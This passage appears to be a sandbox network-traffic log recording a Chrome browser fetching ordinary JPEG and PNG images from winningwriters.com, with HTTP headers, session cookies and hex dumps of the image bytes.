                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:07 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Mon, 14 Oct 2024 19:39:29 GMT
                                                                                                                                                                                            ETag: "1f219-62474fecc88b6"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 127513
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:07 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 46 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyFhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 36 53 a0 b8 9e 56 9e e1 2a 20 b4 48 dd 62 41 c3 d0 72 ad 3e f3 80 7c 37 c1 28 16 b6 76 13 19 15 68 2a aa 1a a6 80 64 2b 45 3e 58 09 38 36 db d9 68 d7 ae b1 21 19 db c7 a9 98 f9 33 13 fb 00 c0 52 3b fb ba ec f6 d4 1b 26 c8 a8 fb d3 1d 32 5d 85 0f 15 9c 60 66 aa 4d 57 a8 41 c9 47 cb c4 e7 80 cc ed ae e4 86 de 1b 3c 95 35 99 9a a7 d7 23 b8 c9 8d 7c 30 03 11 fc a5 25 68 59 da 95 1c bc 70 0f 61 04 28 2b 93 1f dd 80 75 6a c3 a8 35 a8 1a 4e a2 47 96 02 4a 32 ef eb 03 4c 75 24 37 93 72 c0 28 24 5e 09 92 fe 26 38 07 08 55 94 d3 2a 73 3e 78 05 17 51 25 8d 5f 2a 60 0c 18 2b 57 8e 00 0d 6b 5c 00 d6 a7 8e 78 00 cb 01 df bb 00 55 e3 5c 01 8f 96 00 70 00 70 05 a9 c0 08 d4 df df 80 36 92 a2 b5 ae 01 1a 1e 78 02 3f 0c b0 0d d8 d4 d3 00 8c 85 40 3e 38 06 cb 5d 59 73 c0 32
                                                                                                                                                                                            Data Ascii: 6SV* HbAr>|7(vh*d+E>X86h!3R;&2]`fMWAG<5#|0%hYpa(+uj5NGJ2Lu$7r($^&8U*s>xQ%_*`+Wk\xU\pp6x?@>8]Ys2
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 5e 94 63 53 91 c6 87 00 79 6e c8 fc ab 6f cb 89 45 2a bc 5b cf 00 88 b9 9a 33 d4 12 b0 23 32 6a 4e 01 36 dd 2f 48 2a 1c 22 b7 1d 00 02 7e 27 00 84 34 32 12 49 ad 09 ae 01 cd c4 ad 15 a2 c4 32 ea 9d 6f e3 97 0c 02 b0 59 5c cc 82 45 4a 29 15 ab 1d 3c b2 e3 80 f6 5f e8 df b1 3b 76 c3 61 bb ef d3 73 6d b8 77 c6 e4 cf 6a 91 44 da e7 da 76 e5 a7 e5 10 78 49 31 1a e4 75 1c 34 a5 72 c0 6d 37 1d bf dc 7d bf dc c7 79 ec e8 ed e6 d8 b7 23 ff 00 9c 6c 4e c2 05 13 69 a7 d4 23 1c 81 f2 5c 03 c9 2c fb f3 79 74 4b bb b8 3b 7e c8 1f cd 5b 06 17 17 2e a4 7e 17 61 45 20 fe cc 03 f8 bb 47 b7 ac e5 4b db 88 3a d3 a5 0a 5c 5e c8 5e 85 79 8d 64 0e 18 09 95 b9 82 4d 11 c7 71 13 97 ce 34 49 10 ea 03 9a 80 73 fb 30 0a 7a 91 b9 86 1f 66 02 a1 b2 45 69 b5 77 f6 f7 65 68 bd 18 b7 08
                                                                                                                                                                                            Data Ascii: ^cSynoE*[3#2jN6/H*"~'42I2oY\EJ)<_;vasmwjDvxI1u4rm7}y#lNi#\,ytK;~[.~aE GK:\^^ydMq4Is0zfEiweh
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: e5 56 a9 c0 27 b3 a1 1b 5b 07 70 ed 7d a6 d8 b1 e3 a5 88 57 ff 00 ba ca 3f f9 b0 0f b7 fd ce d6 29 77 45 88 74 1e ce c2 28 90 b5 68 b7 72 b0 95 92 9c 28 23 e9 85 3f 1a e0 33 17 db cd ed ec b2 c9 ac c6 8c 02 c4 4a 22 c7 1d 2a 0c 8e e4 28 2d f3 e8 15 34 35 3e 18 09 fd 93 66 5b a9 4c 11 dc 14 4a 81 f4 f6 49 d6 95 97 8f f3 5f 40 0b e3 a1 30 1b ff 00 62 f6 65 92 47 01 1b 62 75 22 55 04 80 ee 18 8f 23 45 14 e7 41 80 da 36 4d 9d 23 51 45 64 23 e5 55 c8 fe ca e0 2d 30 d9 c6 80 51 73 1c d8 92 70 0e 05 be ac b3 3e 4b 96 01 64 b7 61 4a 0c fc 39 e0 1c 08 02 69 66 a0 7e 20 f2 a7 96 01 55 88 03 90 f2 a9 c0 0c 88 08 1c eb 80 49 61 cb 25 cc 71 18 02 ba 57 91 0d c8 8e 23 00 8b 45 53 a0 8c fc 79 60 1a cd 08 ce 87 d2 7c 70 11 97 36 c1 89 a8 e3 c4 73 cf 01 59 dd ec 55 d5 d7
                                                                                                                                                                                            Data Ascii: V'[p}W?)wEt(hr(#?3J"*(-45>f[LJI_@0beGbu"U#EA6M#QEd#U-0Qsp>KdaJ9if~ UIa%qW#ESy`|p6sYU
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 33 38 0d fb db 8f 64 76 d9 62 b2 bc ef 2b f3 63 b8 ee 41 56 36 40 93 db 6d c9 2d 0c 53 11 9e b9 10 d1 89 07 48 c0 7a fb db dd cf ba a0 ee ad 9b db ae f5 86 d7 6f ef 2e dd 86 6b 85 bd b5 21 2d 7b 8b 69 28 11 6f e0 4c a9 28 a2 ac d1 82 c5 5a bc 14 8c 06 dd 80 a5 7b b1 75 b3 58 f6 4d ed d6 f4 f1 c4 23 a4 96 12 48 40 65 b9 56 1a 59 2b 9e 42 ba 8f 86 00 92 f7 56 d7 37 b3 72 f7 87 78 c4 97 7d be 36 69 ae 37 d8 cc 2f 22 4d 6c a8 ca e7 a6 3d 45 5c 0e 5e 35 e1 80 f9 49 61 de 7b fe c3 fd 7e d3 b3 b7 3b ed 8b b7 bb 87 a9 0d de d9 6f 3b 28 96 c5 9c b4 71 4a 57 e6 d2 a7 4d 45 32 cb 86 02 3f 61 5d 97 fa f6 d2 bd c6 64 4e da fa db 61 bc 9b 75 2d 28 b1 ea af 5f 42 82 09 6d 15 c0 7b 3b f5 7b 6d ec 04 1e d4 6c 37 5d 85 0e cc fb d5 ed dc 0b da d3 ec 4d 18 64 db e3 0c d7 1d
                                                                                                                                                                                            Data Ascii: 38dvb+cAV6@m-SHzo.k!-{i(oL(Z{uXM#H@eVY+BV7rx}6i7/"Ml=E\^5Ia{~;o;(qJWME2?a]dNau-(_Bm{;{ml7]Md
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 95 72 c0 75 ad 9d bd ba b4 11 2b 28 14 2c c3 d4 58 8e 04 f3 3f 0c 02 c2 4a 81 50 68 a4 9a 50 ad 7f ec c0 07 ca 8c c2 a0 b7 e2 a7 e2 af 87 1f 86 00 b2 ca 13 d0 46 60 64 a4 d4 9a 9c 03 77 ab bf 8b f9 e5 5c 06 8b ed 1f b2 bd db ef 36 ef b8 59 76 e4 b6 fb 66 d5 b4 42 25 dd b7 db f0 e6 d2 07 90 16 8a 20 a9 ea 77 60 a5 8d 32 55 1a 9b cc 33 fb b8 16 da f2 e2 d6 3b 88 6f 23 b7 9e 58 12 f6 de a6 19 c4 4e c9 d4 8a a3 34 7a 6a 53 e1 4c 02 41 41 19 57 2e 24 73 c0 17 21 50 6b ab 88 3e 63 00 a3 02 d5 d4 fa b4 81 99 e2 72 e1 80 d4 fd bc f6 27 bc 7b fb b7 ae 7b b5 6e 2d b6 1e d1 24 ad 8e e5 7c a6 54 bc 74 72 92 98 a3 46 56 09 19 14 32 36 47 95 70 15 63 d8 77 36 bd db 65 da 5b f6 e9 69 b7 db df b0 11 6e ba cc 96 ac 09 d0 34 e5 5d 45 bd 21 4f 3c ab 80 b4 5a 7b 19 dc 76 3d
                                                                                                                                                                                            Data Ascii: ru+(,X?JPhPF`dw\6YvfB% w`2U3;o#XN4zjSLAAW.$s!Pk>cr'{{n-$|TtrFV26Gpcw6e[in4]E!O<Z{v=
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: a0 87 41 24 0c b3 18 06 1f f4 ce c5 6f 9c 30 49 d5 00 b0 97 53 54 e5 42 59 81 cf 21 80 34 fb 56 dd 79 02 5a dc c0 93 5b 2c 81 92 2b 95 eb c6 a4 57 d5 46 ae 7e 63 3c 03 18 7b 7a c6 c0 4f 26 dd 6b 67 6d 72 26 66 b7 b9 8e da 35 78 e2 71 5a 29 6a fa 94 f3 c0 31 bd da 2f f7 2b 75 8f 70 dc 0c 92 d3 4c d4 01 43 10 de 99 00 1c 09 f0 f0 c0 27 b4 76 75 b5 b3 2a 94 ea 46 00 d2 0e 64 3f 3a 1e 40 f8 60 2e 96 d6 1d 35 08 c3 d3 fc 27 96 01 dc 90 90 87 46 47 98 ad 30 11 db 82 ea 07 2c c7 1c 05 03 bd f6 81 bc 6c f7 16 ee a3 51 46 d1 95 73 a5 33 f8 8c b0 1e 35 dc 6c cc 37 13 59 b0 a1 81 d8 2a be 5a 94 1c c7 c4 71 18 06 2b 13 1f 48 ae 79 a9 f1 1c 30 0a ac 65 a3 aa 8a 0f 0f 2c 01 e3 5d 0f e9 3e a1 cf 01 25 02 bc 82 ad 98 19 67 80 b0 6d 57 8f b7 dd c5 32 28 d4 08 2a 1c 1d 2c
                                                                                                                                                                                            Data Ascii: A$o0ISTBY!4VyZ[,+WF~c<{zO&kgmr&f5xqZ)j1/+upLC'vu*Fd?:@`.5'FG0,lQFs35l7Y*Zq+Hy0e,]>%gmW2(*,
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: c8 cf b7 96 93 33 72 59 ff 00 21 72 59 29 c6 b4 04 30 09 61 9e da 79 ad 2e 61 92 de f2 de 47 86 e2 de 65 31 cb 14 b1 92 af 1b a3 00 55 94 8a 10 78 60 0d 0c 13 dc 4a 90 5a c4 f3 dc c8 69 1c 10 a9 92 46 a0 ae 4a a0 93 90 ae 00 a1 45 32 ab 16 15 1a 70 0b db c9 35 bc 91 dc 42 da 6e 62 75 78 9c 50 95 65 35 06 9e 47 00 ac f7 13 5d 4f 3d d5 c1 0d 75 3b bc 93 30 50 81 9d 8d 4b 05 5a 00 3c 86 01 24 04 1d 49 97 88 15 00 13 fb f0 0a 10 fa 50 f0 6a 56 b5 3c 39 60 0e 75 19 0a d4 12 b4 15 19 12 1b 3a 92 38 e0 01 96 a0 ae 91 43 55 14 fe 2f 12 70 0f 76 fb cd cb 65 bc b6 de 76 7b c9 f6 fd d6 da bf 4b 77 6b 21 86 78 b5 a1 8d b4 b8 a1 15 56 2a 7c b0 0c d0 e8 1a 12 30 13 e6 60 dc 33 cf e3 e6 70 04 d3 a3 54 8e 45 06 40 8a fa ab ca 9c 86 02 db d8 2c 92 6e b7 01 73 56 80 ab 46
                                                                                                                                                                                            Data Ascii: 3rY!rY)0ay.aGe1Ux`JZiFJE2p5BnbuxPe5G]O=u;0PKZ<$IPjV<9`u:8CU/pvev{Kwk!xV*|0`3pTE@,nsVF
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 10 5b b2 0f 9c 8d ba d9 54 3b 70 34 d5 31 a0 e0 78 e0 15 ed b1 1a da 8b 44 66 9d e3 4d 3a db e6 39 83 90 34 d4 ab 9d 0e 02 ff 00 6d 39 b7 db a5 bf 65 8f a8 b0 4d 2d 69 a9 09 10 b8 06 99 7c be 38 0f 2a 46 26 4b 68 9e 54 aa 28 1a dc 1c 89 a7 13 e2 6b cf 01 17 77 22 c8 46 8e 0a 4d 08 c8 67 9e 58 06 12 cb 40 ce e6 80 54 b3 1f 01 80 f4 37 69 77 2f b8 1e da 7b 5f b2 6c ab d9 46 f6 c7 73 6b 8d fe ca fe d2 e5 5a 69 46 e3 4d 02 e6 de 9a 91 95 14 00 05 7d 3c b3 c0 2b b7 f6 c4 dd cd 2f d6 7b ff 00 ee 2d af 64 f6 f5 0d d4 3d a3 67 76 b0 5d 3a c8 34 6a 97 46 ad 21 86 5a 68 ed f0 c0 68 9d b3 dc df a2 5e c1 85 ed f6 0b 38 77 69 92 05 5b bb f3 b5 df 6f 72 f4 e4 35 d3 24 b2 44 51 2a 47 ca 02 e0 1e 77 77 bc 5f a7 7e e7 d8 27 ed 28 fb 45 da eb 78 db e6 b7 d8 8d f7 6d 8b 28
                                                                                                                                                                                            Data Ascii: [T;p41xDfM:94m9eM-i|8*F&KhT(kw"FMgX@T7iw/{_lFskZiFM}<+/{-d=gv]:4jF!Zhh^8wi[or5$DQ*Gww_~'(Exm(
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: a6 fd 42 46 a0 0d 28 29 e3 80 31 42 84 33 ad 55 c0 0c 0f 1d 5f 87 98 a1 1e 58 0b b7 b6 5b 74 77 3b ed e4 4e df 92 96 65 d9 4d 4f 07 8e b5 a7 88 3c 46 03 69 d9 61 b3 b1 51 0c 2d f9 08 00 80 20 07 25 39 2d 46 01 29 a6 51 ba bc ca 29 0a 1f 9f 8e 64 66 0d 7c f0 0f a4 bf db ec 67 12 6e 37 b1 da c1 40 ea 65 91 22 5a f1 22 ae 40 f3 c0 67 7d ed ee 5f 6d 0b c8 e6 d8 6e ce e5 79 0b 32 1f a7 0d d1 e8 c8 0a c9 19 95 a8 0e aa 54 e9 f2 a6 03 37 bf ee 99 37 45 ba 8d ad d6 da 07 22 56 20 d4 f5 4e 44 8e 15 2d 4e 78 0a f4 53 43 73 68 db 74 49 d3 3a f5 69 a8 ac ad 5c c1 6e 5e 40 70 c0 4d c1 60 cf 1a 8b e4 d5 63 77 44 4b 91 4d 71 ca 06 98 dc 30 fc 43 f9 6f e3 80 af 6e 96 af b7 4c db 7b 2d 11 46 a4 96 bf cc ae 5a bc a9 c0 8f b7 00 4d aa 71 67 79 1e a2 b2 4b 19 c9 f3 d0 85 f2
                                                                                                                                                                                            Data Ascii: BF()1B3U_X[tw;NeMO<FiaQ- %9-F)Q)df|gn7@e"Z"@g}_mny2T77E"V ND-NxSCshtI:i\n^@pM`cwDKMq0ConL{-FZMqgyK


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            31192.168.2.164974966.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC880OUTGET //assets/images/insta_heart.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:07 UTC370INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Tue, 09 Mar 2021 17:09:44 GMT
                                                                                                                                                                                            ETag: "7f3c-5bd1d9de0a600"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 32572
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:07 UTC7822INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 ee 00 00 06 2a 08 06 00 00 00 3f f2 98 f9 00 00 7f 03 49 44 41 54 78 da ec dd 07 94 25 57 7d e0 e1 1e 45 10 02 11 64 10 c9 e4 cc ee 02 22 c7 06 a4 ee ba d5 33 c3 68 e4 7b ab 07 21 2c db a0 05 0c 06 c3 12 bd 30 78 09 ab 25 98 b0 b6 c1 04 13 45 58 92 c0 60 72 b0 49 c2 06 03 36 08 61 01 c2 48 8c a6 ab aa 47 c1 d2 20 0d d2 f4 de db 1a 1b 21 14 26 74 78 e1 fb 9d f3 1d c9 98 83 46 fd aa 6e dd 7a ff 7e f5 26 26 24 49 92 24 49 92 24 49 92 24 49 92 a4 41 6b cb ba 75 87 74 d3 1b 6f de cf 34 77 9b 0f cd 03 e7 aa 34 dd d6 29 75 55 3c 31 7b 76 57 a7 17 67 7f d6 87 f4 fa 36 a4 b7 e7 bf 7f 4f fe cf 4f c9 7f ff 99 2e a4 2f 75 21 fe 53 fe ff fd 73 17 9a 9f e6 ff fb 9c ec bc 2b b9 38 5b d8 0b db af e2 7f eb e7 8b ff
                                                                                                                                                                                            Data Ascii: PNGIHDR*?IDATx%W}Ed"3h{!,0x%EX`rI6aHG !&txFnz~&&$I$I$I$IAkuto4w4)uU<1{vWg6OO./u!Ss+8[
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 2a 1e 53 8e 1b e7 0e 00 00 fb a4 4a 7f 6c 77 2d 69 64 ea 42 7c 91 c5 1d 00 80 25 fc 8d d7 13 ec b2 75 ad 43 bb d0 3c de 13 3f 00 00 58 32 75 7a b1 5d b6 a4 a1 6e 61 62 62 4d 57 35 af b6 a8 03 00 b0 d4 da 2a fd 91 1d b7 ae 7e 68 17 9f ea 3c 01 00 60 a9 f5 a1 79 6d 79 df db 8e 5b d2 f0 0d ed 62 dc bf ab d2 9b 2d e6 00 00 2c a3 17 da 79 eb ca b5 21 bd c0 b9 01 00 c0 f2 0d ef d2 5f 97 f7 bf ed bc 25 0d d7 d0 2e 34 27 5b c4 01 00 58 f6 4f de 85 74 92 1d b8 ae 30 b4 3b c9 79 01 00 c0 f2 6b 4e 36 bc 93 34 2c 43 bb 83 f2 cd f2 87 2d dc 00 00 ac d8 6f bc d6 e9 75 1e 57 33 e6 f7 21 1e d3 0f 00 c0 ca fb 58 79 3f dc 6e 5c d2 40 0f ed ca 62 65 c1 06 00 60 15 bc c1 f0 6e 8c 87 76 f9 f5 77 0e 00 00 b0 f2 e2 df 6c 59 b7 ee 10 bb 72 49 03 57 59 9c ba 2a 7d c1 42 0d 00 c0
                                                                                                                                                                                            Data Ascii: *SJlw-idB|%uC<?X2uz]nabbMW5*~h<`ymy[b-,y!_%.4'[XOt0;ykN64,C-ouW3!Xy?n\@be`nvwlYrIWY*}B
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: f4 cc 2f 14 77 00 00 00 00 00 00 d0 7b 37 2a ee 00 00 00 00 00 00 40 71 07 00 00 00 00 00 00 dc b7 b8 9b 33 0c 00 00 00 00 00 00 e8 79 71 57 5e 63 18 00 00 00 00 00 00 d0 33 4d c5 1d 00 00 00 00 00 00 f4 5c 79 cd fe e2 ee 6a c3 00 00 00 00 00 00 80 de a8 43 da b5 af b8 2b d2 95 06 02 00 00 00 00 00 00 3d 52 a4 2b f7 16 77 55 48 97 18 08 00 00 00 00 00 00 f4 4a bc fc de 57 65 a6 8b 0d 03 00 00 00 00 00 00 7a e6 e2 fd c5 dd 85 86 01 00 00 00 00 00 00 3d 92 a7 2f ef 7f 55 e6 05 06 02 00 00 00 00 00 00 bd 2a ee e2 17 f6 17 77 e7 1b 08 00 00 00 00 00 00 f4 48 91 3e b6 ff 55 99 7f 69 20 00 00 00 00 00 00 d0 1b 75 51 fe f5 de e2 ae 0e e5 79 06 02 00 00 00 00 00 00 3d 2a ee 42 79 de be 57 65 e6 e9 6d 06 02 00 00 00 00 00 00 3d f3 ae 7d af ca 2c d2 9b 0d 03 00 00
                                                                                                                                                                                            Data Ascii: /w{7*@q3yqW^c3M\yjC+=R+wUHJWez=/U*wH>Ui uQy=*ByWem=},
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 64 b4 03 c0 78 27 49 92 24 49 92 24 49 46 3b 00 30 de 49 92 24 49 92 24 49 92 d1 0e 00 e3 9d 24 49 92 24 49 92 24 19 ed 00 c0 78 27 49 92 24 49 92 24 49 46 3b 00 8c 77 92 24 49 92 24 49 92 64 b4 03 00 e3 9d 24 49 92 24 49 92 24 19 ed 00 30 de 49 92 24 49 92 24 49 92 d1 0e 00 8c 77 92 24 49 92 24 49 92 d4 7d e6 d5 17 00 e3 9d 24 49 92 24 49 92 24 15 6c 7e e7 f4 da 0b 80 f1 4e 92 24 49 92 24 49 92 8c 76 00 60 bc 93 24 49 92 24 49 92 64 b4 03 00 e3 9d 24 49 92 24 49 92 24 19 ed 00 c0 78 27 49 92 24 49 92 24 c9 68 07 00 c6 3b 49 92 24 49 92 24 49 32 da 01 80 f1 4e 92 24 49 92 24 49 92 d1 0e 00 8c 77 92 24 49 92 24 49 92 64 b4 03 00 e3 9d 24 49 92 24 49 92 24 a3 1d 00 18 ef 24 49 92 24 49 92 24 c9 68 07 00 c6 3b 49 92 24 49 92 24 49 46 3b 00 30 de 19 ef 24 49
                                                                                                                                                                                            Data Ascii: dx'I$I$IF;0I$I$I$I$I$x'I$I$IF;w$I$Id$I$I$0I$I$Iw$I$I}$I$I$l~N$I$Iv`$I$Id$I$I$x'I$I$h;I$I$I2N$I$Iw$I$Id$I$I$$I$I$h;I$I$IF;0$I
                                                                                                                                                                                            2024-11-18 20:00:07 UTC750INData Raw: 00 00 10 21 de 89 76 00 00 00 00 00 00 44 88 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68 07 00 00 00 00 00 40 84 78 37 cb fd 22 da 01 00 00 00 00 00 2c 90 78 37 ab fd fa c7 e6 f9 e7 fe b5 00 00 00 00 00 00 0b 25 de 89 76 00 00 00 00 00 00 44 8c f1 ee 7c 33 1c 0b 64 a2 1d 00 00 00 00 00 00 13 1b e3 d0 18 89 84 32 d1 0e 00 00 00 00 00 80 89 89 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68 07 00 00 00 00 00 40 84 78 27 da 01 00 00 00 00 00 10 21 de 89 76 00 00 00 00 00 00 44 88 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68 07 00 00 00 00 00 40 84 78 27 da 01 00 00 00 00 00 10 21 de 89 76 00 00 00 00 00 00 44 88 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68 07 00 00 00 00 00 40 84 78 27 da 01 00 00 00 00 00 10 21 de 89 76 00 00 00 00 00 00 44 88 77 a2 1d 00 00 00 00 00 00 11 e2 9d 68
                                                                                                                                                                                            Data Ascii: !vDwh@x7",x7%vD|3d2wh@x'!vDwh@x'!vDwh@x'!vDwh


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            32192.168.2.164975066.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC635OUTGET /assets/images/search.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:07 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Wed, 24 Oct 2018 18:10:40 GMT
                                                                                                                                                                                            ETag: "63c-578fd6760a800"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 1596
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:07 UTC1596INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 1c 08 02 00 00 00 ac fb 7b a0 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 b1 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 31 20 36 34 2e 31 34 30 39 34 39 2c 20 32 30 31 30 2f 31 32 2f 30 37 2d 31 30 3a 35 37 3a 30 31 20 20
